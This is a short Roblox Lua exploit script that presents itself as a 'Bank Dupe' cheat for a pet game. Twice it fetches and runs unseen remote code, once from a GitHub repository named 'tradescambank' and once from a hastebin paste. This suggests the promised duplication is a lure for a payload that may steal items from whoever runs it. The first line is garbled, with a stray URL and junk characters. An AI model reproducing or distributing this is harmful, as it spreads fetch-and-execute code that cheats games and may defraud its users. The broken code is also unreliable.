local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/LeaksScriptPSX/DUPESCRIPT/main/tradescambank",true))(); https://raw.githubusercontent.com/KoxHacker/1234/main/1234()()()()()()()DEV)_)_)_)_)_)_
local Window = Library.CreateLib("Bank Dupe", "DarkTheme")

--Dupe
local Trade = Window:NewTab("Bank")
local ScamSection = Trade:NewSection("Dupe")


ScamSection:NewToggle("Dupe", "Put Pet are bank and wait 1 day", function(state)
    if state then
        _G.Key = 538057555
        loadstring(game:HttpGet("https://hastebin.app/raw/626c2b78d3810c001cf24b08"))()
    else
        print("Toggle Off")
    end
end)
